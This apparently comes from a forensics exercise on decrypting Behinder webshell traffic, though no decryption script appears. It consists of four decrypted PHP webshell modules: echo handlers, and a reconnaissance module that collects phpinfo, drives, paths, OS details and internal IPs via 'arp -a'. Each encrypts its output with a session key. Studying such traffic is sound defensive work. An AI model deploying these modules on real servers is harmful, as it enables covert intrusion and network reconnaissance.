取证流量分析冰蝎流量解密python脚本

HTTP—1 @error_reporting(0); function main($content) { $result = array(); $result["status"] = base64_encode("success"); $result["msg"] = base64_encode($content); @session_start(); //初始化session，避免connect之后直接background，后续getresult无法获取cookie echo encrypt(json_encode($result)); } function Encrypt($data) { @session_start(); $key = $_SESSION['k']; if(!extension_loaded('openssl')) { for($i=0;$i<strlen($data);$i++) { $data[$i] = $data[$i]^$key[$i+1&15]; } return $data; } else { return openssl_encrypt($data, "AES128", $key); } } $content="YUhLakxzV2sxRHhrNFNOeXJkckY4cFBtMEFKME9EZ0dyNW90a3JIZjJHbUloV0p3REhxVWVsMmRUSjhmZllzaWhOZWxTbHlHZUprMUg0T0tZd0U5Y3pjTFlqNXA1Y1NPa044WDdsWThBbWtIZ2oyckpTYjBpU3pnVXVXN3VkSThud1J0ek04WGt4dGtxeUxaZks5clV1WUEwU0VmaWNUT0lOVW1pbmRXbDBRRTBmNm1oeUhmWThlWW5qTm5UVFRkc2VIY1lDOTZ4SFNaeUxrWEdpcE9RUkI2TTg1VTRzUkw3ZGNyUFVLdGJFYkdKZHN5blpyU2V5dU1JRlBaUGNJZXRKVWRCSm5xdFdMZkw2TU5kZzhtQzc5MUFQMTdSMzI3NXM3S3VGejA3WFpaU1hzV2ZMakVDZE93emgyS2MyUWRiTm9aZnFRcDBUdGFycFpUaHRhR1lXRkt2YWhseGZLWjVkVlRWUDRRTHZiQW1IOEtnS0xwbU9pZTVsdXhtWEFyRURrQWFzWUFGOGcyc0xoamlqWGJYTDFFRlF0R2FiVkNYU1NRWEJ4MXZNWkFvY29rc2NjR0ZJRDU2ZWFGeWxtQnhjMkpDUDU2ZUlHZzJkRVhhaUhvakZaTTIzRVZXeUtjSDZnVllIRjJoMHBtS0ZnZWg2cVJrRjhEZ2JJSHFOSjhaNmtkZGZZMG1BV2RZYmd2MThuRWltaUMxN21Ob0hQUzhDSnhTcnFleGx1blFodHZxMExBdWk5Z0tzR2Q4QnVWeWNObjN4WjlGRHlBMEljaXJYejVESWY3UDJWQTJLdVphb0p1NEUyMGtEdVhzdm5nNURWUlZnRlh1dVJhNlJYYkJqdjhQejRmZkVxU0Nua3VGM0x3Q2Z5aUdvMlZTYWF4N1BydXltbEZFTkxucTkweHFodW1jcmhrT0NUN09xVnNCOFdRNzdrZE9OWTJOMUd4YmZPZ0ZWY0JtRGxRSHdqN25vSEtJaGtsbDY5bU04b25mM3gxZmViSjBKZ2FX";$content=base64_decode($content); main($content); HTTP—2 @error_reporting(0); function main($content) { $result = array(); $result["status"] = base64_encode("success"); $result["msg"] = base64_encode($content); @session_start(); //初始化session，避免connect之后直接background，后续getresult无法获取cookie echo encrypt(json_encode($result)); } function Encrypt($data) { @session_start(); $key = $_SESSION['k']; if(!extension_loaded('openssl')) { for($i=0;$i<strlen($data);$i++) { $data[$i] = $data[$i]^$key[$i+1&15]; } return $data; } else { return openssl_encrypt($data, "AES128", $key); } } $content="SzRUSEVoQ2lLM01oU3M1eVhjZWZ6UjFqd255c2ZsWWlYM0VyUUVFWnVyeE1BSEpNUzV1QWpqMVBxaTM3cUM1bjIwTEE2NkRhQnRFS1JRamt1eW5SUTZBRmV6eXhxQWQ3dmlVUHhIQ0hEamd2ZnVpc3ZjR1h5bWpaaWZPV1VvZUdOMmRianYxd3lGalZIWGhhMm9MaXltYVVxUk84UlVncGt0SEp1akdNT2F4aXBkV2R6cURGT3lYNm80OGgwNFB3SHVYMlAzU2d1SW5keWFwN0ZmUTE3aW12OWtBMXdhREQyNUFDSzVCMk5pdUJGR29HS2NhZ2EyZEd4aXdzS0R0eXU1U1hHa3U1UnZOcTBFY0ZDZjExaXFZNXB0NEdYVDZJdkJCR256R2NGTm12SWNxS1h2RlR1RFB3aG1xZzhyWFhWV3JrS1NKWWp2UnFCQzhQdVVra1dKVzRJWVQ2MGlaOXMzUzRwUXhWdDhFVzd1OG5waVJOMjg1YkdTVnFPeng1VUhZN1JUTU5lWnowRkdEcWhZdjdOb0tCMHYxWEZyUFQzUTQ5QjFMMjBKcThpd1FvNDcwS3pGamNWN0FxZjBVNVpaQXRDUDllU2pZNXZ6ZkUyWGEzeVJWTG5USTduUjg0bUw3NUxkNjIyWVRrSFh5TWtVbDFybnNtR1FJQlJ3WjZXYjJnTE8wVHlzME1EMGpRQW14RHdqVTlHQ1U3ZWR3MzdxQkQzRFQzc3FzU29HejZCaUdEbXg0dnhvT21JNzljTGVSZVdmcUlXWnRtdlpGRnBGNThWYVR1UHFPbFdrWjNWSU5mUlp1eVdySG1CeXI1S0xwelZIdlZxT2NJY0ZEaVRWM1ViM2xKV2JsVmQ1QmkxOEFxWFFveUI5Q1pvanV4a0dydkJlcFdUSk02VUM2Sm12dXNIMGdaTEVYZDlPbm53aUVtbFN2TkRhOXFPZGMwb2dwdFYxRXdLWkV6NmVSYkd5QXQwajZZbGs4U2s3Ym5iNjVDeTVIWnRvZ0syU1E0c21DSTh4Q1VwSFJlcXNQMUc=";$content=base64_decode($content); main($content); HTTP—3 error_reporting(0); function main($whatever) { $result = array(); ob_start(); phpinfo(); $info = ob_get_contents(); ob_end_clean(); $driveList =""; if (stristr(PHP_OS,"windows")||stristr(PHP_OS,"winnt")) { for($i=65;$i<=90;$i++) { $drive=chr($i).':/'; file_exists($drive) ? $driveList=$driveList.$drive.";":''; } } else { $driveList="/"; } $currentPath=getcwd(); //echo "phpinfo=".$info." "."currentPath=".$currentPath." "."driveList=".$driveList; $osInfo=PHP_OS; $arch="64"; if (PHP_INT_SIZE == 4) { $arch = "32"; } $localIp=gethostbyname(gethostname()); if ($localIp!=$_SERVER['SERVER_ADDR']) { $localIp=$localIp." ".$_SERVER['SERVER_ADDR']; } $extraIps=getInnerIP(); foreach($extraIps as $ip) { if (strpos($localIp,$ip)===false) { $localIp=$localIp." ".$ip; } } $basicInfoObj=array("basicInfo"=>base64_encode($info),"driveList"=>base64_encode($driveList),"currentPath"=>base64_encode($currentPath),"osInfo"=>base64_encode($osInfo),"arch"=>base64_encode($arch),"localIp"=>base64_encode($localIp)); //echo json_encode($result); $result["status"] = base64_encode("success"); $result["msg"] = base64_encode(json_encode($basicInfoObj)); //echo json_encode($result); //echo openssl_encrypt(json_encode($result), "AES128", $key); echo encrypt(json_encode($result)); } function getInnerIP() { $result = array(); if (is_callable("exec")) { $result = array(); exec('arp -a',$sa); foreach($sa as $s) { if (strpos($s,'---')!==false) { $parts=explode(' ',$s); $ip=$parts[1]; array_push($result,$ip); } //var_dump(explode(' ',$s)); // array_push($result,explode(' ',$s)[1]); } } return $result; } function Encrypt($data) { @session_start(); $key = $_SESSION['k']; if(!extension_loaded('openssl')) { for($i=0;$i<strlen($data);$i++) { $data[$i] = $data[$i]^$key[$i+1&15]; } return $data; } else { return openssl_encrypt($data, "AES128", $key); } } $whatever="bEkyWjBWRkY3d1JoYnphSjloemV3ZktGOXZLMElTZUUzMVBRcUY5a3ozcWtER1Q3aTJaYndudlRLZ3JGRURnd2pYblZSQ01tdTAwTw==";$whatever=base64_decode($whatever); main($whatever); HTTP—4 @error_reporting(0); function main($content) { $result = array(); $result["status"] = base64_encode("success"); $result["msg"] = base64_encode($content); @session_start(); //初始化session，避免connect之后直接background，后续getresult无法获取cookie echo encrypt(json_encode($result)); } function Encrypt($data) { @session_start(); $key = $_SESSION['k']; if(!extension_loaded('openssl')) { for($i=0;$i<strlen($data);$i++) { $data[$i] = $data[$i]^$key[$i+1&15]; } return $data; } else { return openssl_encrypt($data, "AES128", $key); } } $content="V3U3cHVaTnYyTllqcmdKYThTMjVrekVNbzg1cXNkSWlQMDV2YklmY3JqZ0tiMlFlbENBWUVrZ0lFS21QN29KTFdNdnlZNWRub2ZFcGFWT0ZGTmlMNlk3d0FUcko2UHZKZDdWNmV2UEJuZ2I0dkFQUm9kRXFFSTZZT1h6Y0hoRzF4VGpDQWp4VjVtS1p0WlpOd2JwT3ZkQW1DRW5oakgwRm5yWEl2bXBLNU5IWjFqNG12NGpzeWJIQ3dxUHpoUWRqOU4xc1piMEp1VDNUMWNtYjB1cHJZVkV2YURjcTZ5eUVmalNTUFhzNG1Sc2hMekFqaDNLUTBsZEc5NTdzOFJKMHhsNkN3bmxZQmRaaUJHNjc2eG50OG9BN0NDcVNveFdLSGQwV21vVmYxcVdiQ1FRREtDMWg4a3BFbFV1NVZFdmxjRjNyMHBPZlZjNndlcldQdDhXTUplM0hvN2ExaERRV0JmR3NSVGZad0wybDVwU1pISHBoNHFlRjFhYlZyWkNrMDVlZXBkS3UxTGMzVWg3dDdYbGJJZXl4Q3Y2RGFUeDRPMDFybFFoZ01ERlpBck4xdm1RMEdoTG55TDJxc2RkeGFPd1A0RTZmUDNJVjA1bVZScHZ1TUNMSDNMd3ZzdUc0M0tVWkFZREV3MnNndGd5YU9jUXNTNGZZZjlnU1ZzMnFmbUJoV3NwakRsVzZKVGpvQ1d1TFZzbFg1MnRMcGV6NnNBYTg5TjhaQjJjWWtIUXZ2dG5WeTV4Y2RUbUx6aWNTR1g3WG05OGs1VjNwVlJYQWdHMVhvZVhkYjJDNzZibmtJZGIyTnJOa01NU3BYNWdabjVqSWl6RlZlN2M2dXphTXU5d0dOR1BVdXZXclpZSDB1OEhFVVFyWXdZT21NQ1hKZ0VsbEh4SFd6MkN2czRVSm01U1poQURTM1hIaDFuYWNaV3ZpVENaVnB2eFJrYThvMzVRZTJLa21RbWlveG5HZVRqa0xydnRNcktrbVNaVFJEOG42YnpHdlYxZ1c3dHR1NlJGbDJCVFZtM2gxQkxLRmc5MjFQbnoxd04wZDIwelp0dzczSVhIZ2xOVE5qbnNpQlJuUXJEd2dneFNoSk5xTEV3amRKSlJYMkhWR041OFNHMFIyUE1CdDVSWmtDTEkzMVJ5WVJ2SlBmaERldEJkM2RoU2xVdDFXSm9pcXJtaU45ZnNneXlBQXVRdzJZbzV3NW9ESDl6c1BERHU5Q29TaFc4MlA0Sk11Y0xZWDdabndDWlZQR